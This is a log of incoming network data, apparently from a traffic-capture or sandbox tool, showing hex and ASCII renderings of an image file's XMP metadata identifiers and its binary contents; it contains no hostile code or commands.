                                                                                                                                                                                    2023-01-05 07:58:11 UTC6222INData Raw: 2d 35 63 65 61 2d 34 63 39 30 2d 61 36 34 66 2d 62 35 37 37 66 37 31 31 34 39 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 35 38 31 34 61 38 30 2d 63 37 64 61 2d 34 33 38 66 2d 62 65 31 61 2d 39 31 39 30 38 65 61 33 64 66 31 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 35 39 31 35 66 36 31 2d 66 35 33 63 2d 34 61 62 35 2d 61 38 30 66 2d 32 35 65 37 30 36 62 34 63 66 30 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 35 62 39 61 35 61 38 2d 64 65 36 62 2d 61 32 34 36 2d 39 38 63 38 2d 30 65 65 39 30 63 31 38 62 37 32 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 36 33 61 61 30 63 32 2d 32 35 33 61 2d 32
                                                                                                                                                                                    Data Ascii: -5cea-4c90-a64f-b577f7114913</rdf:li> <rdf:li>xmp.did:b5814a80-c7da-438f-be1a-91908ea3df1b</rdf:li> <rdf:li>xmp.did:b5915f61-f53c-4ab5-a80f-25e706b4cf0a</rdf:li> <rdf:li>xmp.did:b5b9a5a8-de6b-a246-98c8-0ee90c18b725</rdf:li> <rdf:li>xmp.did:b63aa0c2-253a-2
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6230INData Raw: 61 35 35 32 62 35 36 65 38 66 33 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 64 38 66 66 39 64 64 2d 30 63 34 36 2d 34 35 32 30 2d 61 39 65 65 2d 31 63 64 39 39 31 31 33 35 39 36 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 64 39 64 34 37 30 34 2d 64 32 64 61 2d 34 65 37 34 2d 62 64 65 37 2d 62 39 37 30 39 39 30 33 62 39 36 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 64 62 37 65 34 65 66 2d 66 35 61 61 2d 34 34 61 61 2d 61 63 63 61 2d 37 38 36 64 32 64 61 63 63 35 35 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 64 62 63 64 62 36 36 2d 65 32 62 37 2d 34 30 61 39 2d 39 61 39 65 2d 36 65 32 31 35 63 65
                                                                                                                                                                                    Data Ascii: a552b56e8f37</rdf:li> <rdf:li>xmp.did:cd8ff9dd-0c46-4520-a9ee-1cd99113596a</rdf:li> <rdf:li>xmp.did:cd9d4704-d2da-4e74-bde7-b9709903b96b</rdf:li> <rdf:li>xmp.did:cdb7e4ef-f5aa-44aa-acca-786d2dacc55e</rdf:li> <rdf:li>xmp.did:cdbcdb66-e2b7-40a9-9a9e-6e215ce
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6278INData Raw: 2d 66 62 65 38 38 66 31 38 34 64 34 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 63 34 66 32 39 65 39 2d 62 38 34 35 2d 34 64 66 63 2d 39 64 63 32 2d 38 63 31 36 37 62 31 36 61 31 66 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 63 38 33 37 33 39 35 2d 37 31 30 39 2d 35 38 34 30 2d 39 37 33 37 2d 63 36 39 38 66 33 62 63 35 31 64 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 63 65 63 64 32 36 34 2d 38 64 33 63 2d 34 63 65 37 2d 38 62 65 37 2d 32 62 64 62 63 63 39 64 62 63 65 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 63 66 61 37 63 30 32 2d 35 36 62 36 2d 34 35 63 30 2d 39 30 66 61 2d 64 62 63 63 66 61
                                                                                                                                                                                    Data Ascii: -fbe88f184d4c</rdf:li> <rdf:li>xmp.did:fc4f29e9-b845-4dfc-9dc2-8c167b16a1fb</rdf:li> <rdf:li>xmp.did:fc837395-7109-5840-9737-c698f3bc51dc</rdf:li> <rdf:li>xmp.did:fcecd264-8d3c-4ce7-8be7-2bdbcc9dbce4</rdf:li> <rdf:li>xmp.did:fcfa7c02-56b6-45c0-90fa-dbccfa
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6294INData Raw: 43 42 03 50 03 52 48 68 40 53 40 1a 82 43 52 02 9a 80 1a 00 d0 06 80 29 a0 0a 6a 40 53 50 02 9a 00 d0 06 80 ff d0 d1 88 d7 df 1f 20 1a 00 a6 80 34 02 ea 00 53 52 04 d0 81 74 24 29 a1 00 34 01 4d 09 0d 08 0d 48 0d 40 0d 00 68 03 40 14 d4 80 d4 10 1a 90 14 d4 00 a6 a4 06 a0 05 34 24 35 24 06 80 34 01 a0 0a 68 48 ba 82 04 d4 80 23 40 00 68 03 40 14 d0 0b a1 02 68 48 68 03 40 14 d0 06 80 34 01 4d 08 0d 09 0d 08 17 40 1a 00 d0 90 d0 80 a6 80 29 a0 0d 00 68 03 42 45 d0 80 d0 06 80 34 01 a0 0a 68 03 40 1a 00 d0 0b a0 13 40 2e 80 29 a0 0d 00 68 03 40 1a 00 d0 80 a6 84 86 80 34 20 5d 09 0d 00 53 40 14 d0 81 34 24 5d 40 0d 48 0d 00 53 50 03 52 03 40 14 d0 1d f1 73 26 c0 63 34 0c ca c0 1f 6f 33 4f 41 f8 eb 97 b8 c4 b2 55 ab 29 37 c5 91 d2 d2 8c f3 70 dc f7 ac 09 c6
                                                                                                                                                                                    Data Ascii: CBPRHh@S@CR)j@SP 4SRt$)4MH@h@4$5$4hH#@h@hHh@4M@)hBE4h@@.)h@4 ]S@4$]@HSPR@s&c4o3OAU)7p
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6325INData Raw: 68 03 52 03 40 1a 80 1a 00 d0 06 80 34 01 a0 0d 09 0a 68 03 40 14 d0 80 d0 07 2d 09 0a 68 03 40 7f ff d3 d2 75 f7 a7 c8 06 80 34 01 4d 00 ba 01 34 02 e8 04 d0 06 a4 0b 4d 41 02 6a 49 17 50 03 42 03 42 43 42 03 42 43 40 14 d4 90 1a 82 02 9a 92 43 50 03 52 02 9a 00 a6 80 29 a0 0d 00 68 03 42 03 42 42 9a 01 69 a8 92 04 a6 a4 90 d0 06 80 5a 68 40 9a 13 01 4d 48 0e 5a 82 05 d0 06 80 4d 48 0d 40 0d 00 ba 01 34 02 e8 03 40 20 ae 80 5d 00 72 d4 80 d4 00 d0 06 80 35 20 35 04 05 34 01 4d 09 0a 68 40 ba 12 1a 10 1a 12 1a 10 1a 00 a6 80 34 01 a1 21 a0 17 40 14 d0 06 80 29 a1 01 a0 0a 68 03 42 43 40 2d 34 20 4d 09 16 9a 01 34 20 5a 68 48 94 d0 0b 4d 00 68 40 68 48 68 03 42 03 50 49 11 bb 62 6e 5b 94 b1 41 88 7b 38 eb 20 32 bb 1f 72 11 c6 8a 38 d5 3e 07 a4 fb be 5d 7c
                                                                                                                                                                                    Data Ascii: hR@4h@-h@u4M4MAjIPBBCBBC@CPR)hBBBiZh@MHZMH@4@ ]r5 54Mh@4!@)hBC@-4 M4 ZhHMh@hHhBPIbn[A{8 2r8>]|
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6357INData Raw: 0d 4f 6b d9 d3 ba ab 79 1b af 27 cb 47 1a 1c 99 9d a9 b2 2c db 66 02 61 44 98 b8 0a 3e 9a 10 4d c4 f4 28 ba b6 f0 f8 96 e0 3e 1a fb 5b 66 a6 2c 4a 94 f3 56 38 ae 5f cc f2 f1 62 b5 af 2f 41 cf 93 ef 5b b6 e5 8a b8 98 f2 22 64 47 20 71 25 ab 47 90 1e 88 24 03 83 02 1e 86 31 45 a7 1d 7c ae 5a bd d1 ee 72 9d 0c c6 3d a7 2f 69 df 7b f9 39 89 30 9e 49 06 4a 0a d1 5c 16 07 b2 eb 72 86 42 28 bd 77 27 e5 c3 56 ed 71 5b 9c df 63 87 2e 8b da 5e b0 1f 70 8e 59 31 b3 6b 2c 20 93 8f 31 35 62 95 f6 c9 cb af d4 1f 98 7f 30 d7 dd f6 d5 bd 65 5b 55 f2 bf 67 f5 1e 26 56 9e c3 fd 7a 07 31 d3 1e 07 c9 91 62 8e 97 b1 a0 a9 a6 b3 bd d5 14 b3 4a 51 dd c2 1f 67 ec d3 e0 0b cb 24 89 52 2e 43 51 c0 d0 f0 3c 75 c7 87 bc a6 57 08 ea cb da db 1a 96 46 d3 5e 81 c2 1a 00 a6 80 34 01 4d
                                                                                                                                                                                    Data Ascii: Oky'G,faD>M(>[f,JV8_b/A["dG q%G$1E|Zr=/i{90IJ\rB(w'Vq[c.^pY1k, 15b0e[Ug&Vz1bJQg$R.CQ<uWF^4M
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6413INData Raw: 74 59 62 60 d1 b0 0c ac 39 10 79 11 af d3 29 75 74 ac b6 67 ce b5 0e 19 ea 9a b9 50 d0 05 34 01 a0 0d 00 53 40 0c 0b 29 50 4a 92 29 51 cc 7e 22 ba a5 eb c9 35 b1 64 e1 c9 5c ca c1 c9 c0 c5 96 1c 9c a4 74 9c a8 56 08 56 62 55 83 d2 b7 14 34 50 6b d2 ba f9 2c b8 31 f6 58 df aa d5 ab 77 1e 6f 8e ce dd 0f 52 99 5e 4b 28 e8 76 87 7b 99 77 49 76 d5 12 4a 85 df b5 54 08 11 63 0b 7c 77 92 15 ed b8 15 27 9a 91 c4 e8 fb ce e2 d9 1e 3c 15 af 1a fe bd 3e e0 f1 51 2e 57 7b f8 13 a2 a4 02 45 0f a8 34 e1 fd 95 1a fa bc 6e ce ab 96 96 3c cb 25 3a 06 b5 2a 1a 10 1a 01 74 01 4d 48 0d 40 13 40 1a 90 2e a0 06 80 65 bb 60 4b b9 e1 be 24 39 12 62 b3 d3 f7 62 f7 0a 7a 03 e8 0f ad a4 37 e3 ac 33 51 de b0 9f 1f 69 a5 1c 3d 4a df 8e ed 92 61 24 f0 63 6e ef 96 ea b7 34 65 4a d0 82
                                                                                                                                                                                    Data Ascii: tYb`9y)utgP4S@)PJ)Q~"5d\tVVbU4Pk,1XwoR^K(v{wIvJTc|w'<>Q.W{E4n<%:*tMH@@.e`K$9bbz73Qi=Ja$cn4eJ
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6421INData Raw: 13 80 b1 d3 a7 e6 e7 4a 6d 4e d1 43 6b af b0 ab a1 0d e0 3e 17 e4 99 79 ef b7 fe c4 71 42 a8 cb 24 88 4b 00 c2 e9 23 60 a4 16 a7 24 92 97 0a 75 54 6b d6 c0 9d 7a 19 2a 9b 36 5f 84 6c 1e 35 83 92 76 d8 01 ca 95 42 3e 44 d2 bb b0 99 9e bd da b5 42 54 b7 50 45 4e e5 a2 2e 5d 5a dd da 25 af b3 36 e0 8c df 37 c8 17 c3 37 8f e8 db 84 13 19 23 73 2a 3a 82 ab 6b 5c 7b d4 b9 2e 0d 7b 35 59 69 6b 5b ae 07 dc 3c 6e 2c 66 f4 65 f7 73 c9 db 31 92 11 34 8a d8 f2 b8 8d 1e 50 4a fe b3 1a 1f d7 2f 0a 74 f4 aa b1 d7 a1 cd 38 f6 97 66 67 93 b6 be 56 36 52 6f 69 dc 8f 22 51 69 5a 0b 96 f0 10 29 8d 54 a5 a2 d5 7a 05 af af 3d 74 26 e3 cc 72 c1 67 f0 bf b6 db 3f f4 ac 70 db 8c f3 c5 91 03 cd 0a a3 c6 b1 c1 1b dd 1a 86 7a 35 ec b5 6a df d5 fc 17 54 c7 99 d3 54 cd 9e 24 f7 23 b7
                                                                                                                                                                                    Data Ascii: JmNCk>yqB$K#`$uTkz*6_l5vB>DBTPEN.]Z%677#s*:k\{.{5Yik[<n,fes14PJ/t8fgV6Roi"QiZ)Tz=t&rg?pz5jTT$#
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6464INData Raw: 08 51 2b 18 8d 50 89 0b b0 b0 d4 d6 35 84 f1 eb e1 f2 f1 cf 35 22 d2 88 ad ba 13 b8 1b 82 f4 bc cf 61 73 c2 ea 74 14 1d 68 c4 7b 2d 6e 75 6b b5 d3 8e fe 24 34 72 c7 83 6e 9f 32 1d cc 20 8b 3d 26 8a 6a bd c0 d2 33 42 29 5a 59 22 92 9f fa 87 1d 1d 29 6f 64 8a b7 5d 4b 87 90 cb 83 e6 98 ad b7 66 4b 34 62 24 6e 2b 18 b9 49 21 54 af ba f8 cb 7b dd 88 3e ba f3 6d db ab 3e 2f e5 f8 4e ab 5b 91 df 6b fb 35 e2 52 63 43 b8 0c 99 a7 66 58 43 64 2c 80 74 46 4d 55 6d e0 b1 b9 6b 5c 50 b2 85 a5 75 6f 4d 51 44 bf 78 54 41 b8 fd aa da 55 32 58 24 8f 21 5e e8 94 b0 bd 95 54 14 eb 63 6b 2f 49 e9 63 c1 8f 55 75 85 7b 4a 24 e9 1e 56 59 a2 bd e2 bf 6e f2 33 26 3d 9d d1 fb c9 24 b2 4c c0 73 e1 fb 56 a2 9a 07 52 5a e6 1d 2c be d1 5d 52 b8 ad 83 22 ae 37 c7 49 46 3c 15 f7 34 2f
                                                                                                                                                                                    Data Ascii: Q+P55"asth{-nuk$4rn2 =&j3B)ZY")od]KfK4b$n+I!T{>m>/N[k5RcCfXCd,tFMUmk\PuoMQDxTAU2X$!^Tck/IcUu{J$VYn3&=$LsVRZ,]R"7IF<4/
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6480INData Raw: 0c fd b0 08 80 10 b4 8e 10 a5 39 70 70 fe ad af 2f be c9 97 2b e1 f1 75 d8 cd 55 57 52 c7 b2 78 be 3c 38 b8 f9 01 55 a2 2a c5 54 96 2f 72 8e 1d d3 70 e8 77 ea e9 1f 33 5d af 4f e9 1d 96 5c 94 5a 42 7a ff 00 89 96 4c 94 a2 96 3b d9 76 09 36 bd c7 23 38 b2 76 a5 44 48 a3 55 ab 2d 2a ce ce e7 8d 4b b1 01 13 a2 c0 ba fd 1b b4 ec bd 16 de fc 8f 9f cb 97 99 37 0c 31 c0 8b 14 4a 12 35 e4 aa 28 07 e4 06 bd 64 a0 e5 22 b1 76 cd d6 7c 99 a5 dc e4 ae 1b 33 76 e0 0a 0a 94 06 88 dc 47 0a 7c 7d d7 6b e7 2b db 65 cb 96 cf 33 4f 17 c3 5c 5a 3f f5 58 ed 95 54 b8 ef e2 26 cf 96 70 c6 5f d7 3d 06 3b b3 b4 ae a1 29 12 d4 20 20 00 3a 23 5f 77 cf ab f6 5d db c9 93 26 27 5e 3e 94 45 bf 5d 7a 11 93 1e 89 af 98 a7 78 df 82 7f 51 d9 b2 37 18 91 ce 7e e6 51 da 49 54 34 86 10 e6 4e
                                                                                                                                                                                    Data Ascii: 9pp/+uUWRx<8U*T/rpw3]O\ZBzL;v6#8vDHU-*K71J5(d"v|3vG|}k+e3O\Z?XT&p_=;) :#_w]&'^>E]zxQ7~QIT4N
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6520INData Raw: 5f 71 fc eb ae 2c dd b7 af ba 26 af 89 d3 74 d8 f2 5f c9 70 a3 83 05 f2 b1 4c 6c ed 90 e5 bf 6a 54 34 68 c5 0b 82 ad 54 65 79 29 56 0d 6f 2d 4d 7b 4d 23 c0 bd ac 99 eb 36 2c d6 dc 1d a1 93 b7 74 90 ac 00 d4 dc e8 2b 5e 02 87 8d c9 46 65 72 3d 35 f3 dd ee 77 5b f1 ab 86 6d d0 b0 6e b2 e4 ed 7b 7e 5c 93 49 3b 62 42 88 d2 88 68 64 56 90 1e db b0 e9 e9 2c 2d 66 5e 2b 52 dd b3 af 51 65 e4 a3 f1 09 41 86 24 f9 9e 73 bd c6 d9 04 c6 ca 07 6a 18 d8 d2 d1 c6 40 8c c4 7e e5 2a e0 b1 0a c4 15 e1 51 ad 6b e6 d1 1c cd c9 db c4 b1 37 ed bf c8 b2 33 23 c6 99 d1 ff 00 64 e4 64 2b c4 8f 40 cb 1b 92 c0 b2 0b d0 5d ef a5 b6 f3 2b ae 8d 94 49 74 89 4c c8 71 60 9b 2b 3f c9 d3 23 23 3f b4 90 e3 3c 75 6f fa 90 f4 0f db 6a 23 44 6d 1d b8 e3 1c 63 35 ea 7e 2d c7 75 c9 34 5f da 5b
                                                                                                                                                                                    Data Ascii: _q,&t_pLljT4hTey)Vo-M{M#6,t+^Fer=5w[mn{~\I;bBhdV,-f^+RQeA$sj@~*Qk73#dd+@]+ItLq`+?##?<uoj#Dmc5~-u4_[
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6536INData Raw: 8c a1 8c 52 48 49 52 8b 75 e5 0c 4e 69 77 cf d5 ae 6c 29 5d f2 48 29 93 53 f2 61 bc ec 1b 94 51 c4 b1 cd b4 cc 92 3b e3 e6 46 1c 19 12 45 53 28 65 6a 2f 79 6c 25 5b ae c8 cf b6 ed 75 69 5f bf c4 da c5 53 27 fa 6c 0f 24 d3 e3 a7 d7 64 95 76 90 27 4d d1 d4 4a 58 b0 a1 2c a4 58 78 1e 16 f5 5b ae 87 55 b1 cc 44 6f 99 18 be 3f 8e f5 32 43 05 64 c8 31 42 7a 43 33 5d db 14 06 c5 67 7f 4f f1 72 d5 ed 68 d0 cd 99 bf 85 62 0d f7 3b 23 7b 9a b1 49 8e e4 93 10 aa 96 23 e2 6e 37 71 a5 2d ea 1d 57 57 58 3a 49 9a 34 4c cf 02 cc f3 08 de 18 e2 75 cb 75 79 52 16 45 ad 6c b6 8a a4 8b 6d 01 43 10 dd 37 57 e6 d6 79 6c e3 43 75 49 36 af b5 5e 0f 93 e1 5b 6a e3 89 1d 62 ca 89 24 7a aa 49 20 61 ce b2 81 42 83 fe 57 cc 17 87 a1 d4 61 ad b7 7f 0d a3 48 37 55 83 3e f3 2f b6 db 3c
                                                                                                                                                                                    Data Ascii: RHIRuNiwl)]H)SaQ;FES(ej/yl%[ui_S'l$dv'MJX,Xx[UDo?2Cd1BzC3]gOrhb;#{I#n7q-WWX:I4LuuyRElmC7WylCuI6^[jb$zI aBWaH7U>/<
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6628INData Raw: 95 b5 14 d8 cd da 4c eb 0b 60 8e 4f 2e 6c 5d df 21 e7 69 f1 59 e7 90 55 10 64 3f 52 76 ca fb 95 7d dc 29 5e be 5a a6 48 ea 67 54 e4 9b cd fb 97 bf ed 78 98 f0 ee 0f 2c a1 d7 b4 d2 15 21 17 b3 fb 65 2f 03 a9 99 68 f2 bf 36 e9 af 57 56 b8 bf e4 7d 7c a5 f9 93 3b 5f 9b ed b9 e4 e0 0c 46 84 89 17 b6 62 08 e2 69 3d c5 99 02 89 14 f1 0d ee 65 5a 5b 76 b5 55 a6 4a f0 b2 dc 9e 44 62 fd ad df a1 dd 64 da 20 ba 7d aa 68 4b e3 07 72 a9 1f 79 ee 78 56 2a bd 92 46 4b 34 6c a3 8a 7b 8f 03 af 52 f8 9b 50 55 d6 4d 37 13 ec ce d7 06 d3 0c 59 58 58 f9 19 0b 1b c9 3b 4e a4 b1 61 4e da 12 0d 15 15 16 97 0b 6d ea b9 4d 75 c5 4a 5b 1a e9 3a c9 b2 a2 2f 9e 37 b6 ed 3b 46 df 8f b6 ed 98 30 e0 93 dd 94 ac 11 f0 4a 2d c4 5f c2 a2 4f 94 31 f6 f2 d7 7e 36 ac 93 68 98 81 8f 91 08 33
                                                                                                                                                                                    Data Ascii: L`O.l]!iYUd?Rv})^ZHgTx,!e/h6WV}|;_Fbi=eZ[vUJDbd }hKryxV*FK4l{RPUM7YXX;NaNmMuJ[:/7;F0J-_O1~6h3
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6651INData Raw: 1c 4a cf 1c 68 b6 48 3f 02 cb 79 b8 32 05 31 da 2d ee 03 d5 af 13 b6 c1 7c 6e ce ce 67 ef 36 ac 22 b3 f7 9f cc 22 9b 10 ec 58 f6 64 65 36 5c 6a 61 8b af 2a 34 64 2e 48 8f de a2 42 63 57 54 3c 57 86 bd 7e e3 04 d6 34 9e 87 3d ed 3a 15 af 1d 9b 1f c8 15 b7 49 54 44 9d c7 8c 46 4a ad 1a 00 05 ec 6b ff 00 2e 87 a1 96 8b eb af 33 b5 fa 77 a7 0e cc a2 67 ad 83 1f 23 cc 31 f2 73 0d f9 5b 7a cf 3b 0c 99 95 51 e5 06 97 ba 0f 74 ab 71 fd be 7e de 1a c3 bc ed 6e 9f 2a 6a c9 74 6c a5 ed be 57 91 9d e4 59 49 2d 89 8f 33 76 90 fb 40 44 34 45 90 9e 43 87 57 f3 f0 ad 35 d9 db 62 58 d5 5a f8 97 fe 5b 99 ee f5 34 99 65 c2 f1 f4 8c 4e b0 ac 2b 74 6a 1e 85 4b 32 74 92 dc 6d 08 78 fc 35 ec d3 44 5d e8 53 b1 b7 1c 3d bb c9 5f c9 71 4c 7f 49 d9 b6 55 84 2a 15 91 d4 06 b1 4a 8b
                                                                                                                                                                                    Data Ascii: JhH?y21-|ng6""Xde6\ja*4d.HBcWT<W~4=:ITDFJk.3wg#1s[z;Qtq~n*jtlWYI-3v@D4ECW5bXZ[4eN+tjK2tmx5D]S=_qLIU*J
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6691INData Raw: da 34 bc 9f b8 ff 00 6f 36 ac 0c 1f 14 c0 c9 ed e5 7d 38 c9 81 59 00 fd c5 40 53 ea 1a a5 63 96 5b cb 5a 2b c7 aa a9 cb 5e d3 c4 95 7d c5 f9 24 65 1b 47 97 ed d3 41 97 37 91 98 e4 ca 92 55 9a 4e dc 42 48 c2 17 50 94 55 a2 d8 87 dd 65 c1 fd ac 6e d7 9b 4a eb 3b 6a 67 cf c4 a6 f8 bf 98 70 c5 c1 20 27 6e 1e df b9 84 8b 22 12 cb c1 88 40 a7 e5 a7 cb ee d7 6d b1 ce a5 39 13 7e 3f e4 3b 11 6c 9f 29 dc 32 56 2c bd b2 45 58 e2 06 ab 24 8c 48 5b 5d 7a 9b db 73 15 e5 45 5f 6e bc ab 62 c9 4b aa af 32 b6 ff 00 6e 84 ad 75 38 7d c1 fb ab 3e ef b6 c1 b4 6c 58 26 2c 69 23 56 93 36 58 a5 19 12 ac 6c 4d 38 b3 27 6d 6b d6 c0 71 e1 ec d7 b7 4e d6 8b 58 96 5a f7 38 78 bc 39 32 47 06 4c 92 b6 46 d7 99 11 c7 cb 69 56 db 23 8e 85 d4 b0 f9 6e b8 27 33 4a 73 d7 16 5a 56 d6 f3 68
                                                                                                                                                                                    Data Ascii: 4o6}8Y@Sc[Z+^}$eGA7UNBHPUenJ;jgp 'n"@m9~?;l)2V,EX$H[]zsE_nbK2nu8}>lX&,i#V6XlM8'mkqNXZ8x92GLFiV#n'3JsZVh
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6707INData Raw: 9f 02 c3 fd f3 cf 36 3d b6 05 81 27 80 21 c5 79 92 0a b0 90 a4 25 ad 45 b1 58 46 eb c9 43 95 70 3a b5 d5 5e e1 3a 2b a8 87 f6 41 98 0f de 4f 3f 1b 46 2c 30 cb b7 5a d2 c5 d7 60 31 aa 2b d4 c2 b7 d4 d5 24 2b 2d f2 46 2e b9 35 4e cb 1d ac dd 9b ff 00 4f 81 8d cc 3b 23 cd f3 5e 39 a3 cd 25 27 37 5b 1a f4 88 d9 87 e9 f5 4a 1a fc 6e b5 ab af 57 d2 d4 c3 53 cf 85 6c f2 f9 ce fb 0e 03 26 6b b6 40 02 69 b1 d1 64 64 21 a8 5d aa 7f cb 45 b7 ad ad ff 00 09 51 a6 4a f1 45 ab 59 2e 1e 49 9b 9b f6 ab bb e3 fb b3 63 65 6e 50 92 cd da 73 64 2d 20 06 32 2d 01 4a f6 df 8a 56 eb ee bb 59 e3 c5 3a 92 d4 68 74 ff 00 e3 b7 da cf ff 00 28 3e 51 1e 76 56 35 fb 0e 04 95 9d dd 41 89 e5 02 e8 e1 75 3c 59 5f dd 20 5f 6a 6b 6c b6 d2 0d 28 a4 fb 7d 20 83 e8 e3 db e1 89 60 95 d3 a6 27
                                                                                                                                                                                    Data Ascii: 6='!y%EXFCp:^:+AO?F,0Z`1+$+-F.5NO;#^9%'7[JnWSl&k@idd!]EQJEY.IcenPsd- 2-JVY:ht(>QvV5Au<Y_ _jkl(} `'
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6715INData Raw: c0 9d 4c 69 d5 af 95 a7 6b 7a e4 5c da 6b e2 11 06 5f 8a 98 59 db 90 8e 33 93 1e 54 a9 fe 40 b5 44 4e 64 65 77 90 dd 6c 69 12 1b a3 8d 81 92 a5 51 ed d7 b3 8a 9d 0e 66 b5 27 bf ab e4 63 e7 7f 4e 10 bb e5 b2 aa 88 84 61 9e 59 d1 6a d2 16 23 a7 b9 1f 53 30 36 8d 7a 4b 3a 4e 0c f8 9c fc 73 6f c9 de f2 53 76 c4 82 5c 83 d4 55 88 e3 c0 58 c0 70 b8 58 6f a7 57 52 8f c7 55 f5 27 52 d5 ac 8e 7c c7 c1 b1 77 4d ae 6c 4c 36 c6 c6 23 fe a6 f4 e0 8e fc 03 17 a2 de 18 86 b4 93 f0 a7 cb ac eb 65 67 a7 43 5b 52 11 5d f1 1f b5 99 f2 ee d2 63 2b 47 3c b8 b3 45 49 4b 59 13 b7 0a c8 2f b4 9a 74 d7 d7 5d 15 b3 d5 19 56 92 39 f2 7d e7 cb bc 55 37 2d be 1c 57 c2 9c 4b 10 c9 92 13 dd 0c a8 a0 10 65 0b 44 85 d8 a0 e0 e0 33 1b 0f 55 75 47 78 2c e5 19 ee 5c d9 19 fe 41 8f 93 b7 77
                                                                                                                                                                                    Data Ascii: Likz\k_Y3T@DNdewliQf'cNaYj#S06zK:NsoSv\UXpXoWRU'R|wMlL6#egC[R]c+G<EIKY/t]V9}U7-WKeD3UuGx,\Aw
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6763INData Raw: ee b5 50 d2 06 42 a6 4b 6e 3a e0 cb 9e b8 ab ca df e0 6d ca 07 59 fb ee d9 b1 79 0c 79 38 af 8b 14 f7 3c 8b 10 01 fb 6e 56 c8 9c c0 7a 49 b5 6d 8d b9 47 db 53 c3 d6 52 e5 17 f1 fe 03 91 47 f3 7c dd c7 ee 36 4c 47 bb 18 8d 9d e6 b2 d2 0d c4 50 2a dd 52 bc ba 8a b7 1f 77 2d 6e a2 34 28 f5 66 97 83 f7 2f 73 93 c5 e7 db f1 f0 1b fa cf 6c 63 17 aa c6 8c fd d0 ad 27 69 14 dd 1a 85 60 cf ee 2d c6 ee 9d 73 62 ac b7 2b 5d 8d f9 8f 71 64 dc fc d7 00 ee 9b be 2a 62 61 a9 31 b4 69 2a 93 8f 0a 20 66 67 66 37 ca a2 b7 33 32 73 6b 3a b8 6a ee bc 74 4b 44 1f 9b 56 63 db af 9b ec b8 de 46 fb 7e 36 3c 4b b6 31 93 16 5c a2 ad 56 59 1c 16 98 47 cf b7 d0 2d 40 03 53 ab 87 b7 4a e3 57 5a ee 73 59 a9 1e ff 00 dc fe 35 e2 11 97 8f 23 bb 06 6c cc 96 e3 95 9b b5 1a c6 a8 24 34 2a
                                                                                                                                                                                    Data Ascii: PBKn:mYyy8<nVzImGSRG|6LGP*Rw-n4(f/slc'i`-sb+]qd*ba1i* fgf732sk:jtKDVcF~6<K1\VYG-@SJWZsY5#l$4*
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6779INData Raw: 0e e9 72 d4 ea c7 89 57 63 ce 4e 70 7c b9 71 f3 08 8d a6 88 c9 04 8c 2e aa 10 10 bd 88 6f 36 3d 0f 0e 75 f5 d7 98 de be 63 a2 7c 0c 53 c8 3c 7f cf 25 cd 4c 8c 49 22 c6 7c a9 99 25 fa 5f da 5b ad 2b 1c 92 0e ae a3 10 be e4 bf ab dd fb 9c fc fc 98 ee ad 2b e6 f0 32 72 5a bb 58 1e 06 cb 2e 3c 31 26 e3 70 45 cb 96 2e f4 d7 b1 08 fd c0 6d 69 9a 48 f9 b5 55 79 bd 6e 16 eb b9 63 54 d7 f3 2d 25 7f cd 37 2c 1c cc 4d bb 1f 21 04 18 39 79 92 4b 91 90 84 a1 94 96 5b a3 73 ef 69 1d 4f cd e9 1a aa eb ce ef 2c dd 57 1f 1d 45 99 5b d8 71 62 6d ef ea 36 88 a3 c4 8a 8d f5 30 cf 52 6a 95 58 d9 4a 9e 0f 78 ba 4a 4b 6b fc ca 46 b8 bb 3e 52 eb 6d ba 49 44 a1 ca 2d 39 32 4b 16 5a 2f 74 fe ea 0c 8c 99 14 87 2a d3 28 7b 18 91 c5 5e 1b 0f 6d 3d a1 97 e3 af 62 8e 35 7a 75 65 db 3a
                                                                                                                                                                                    Data Ascii: rWcNp|q.o6=uc|S<%LI"|%_[++2rZX.<1&pE.miHUyncT-%7,M!9yK[siO,WE[qbm60RjXJxJKkF>RmID-92KZ/t*({^m=b5zue:
